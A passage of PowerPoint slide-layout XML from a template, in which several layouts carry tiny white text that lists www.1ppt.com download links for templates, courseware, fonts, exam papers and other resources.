              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout232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32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32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32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3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33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33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33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33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33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33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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout233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33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33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33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3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34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34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34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34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34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34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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout234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34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34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34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3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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
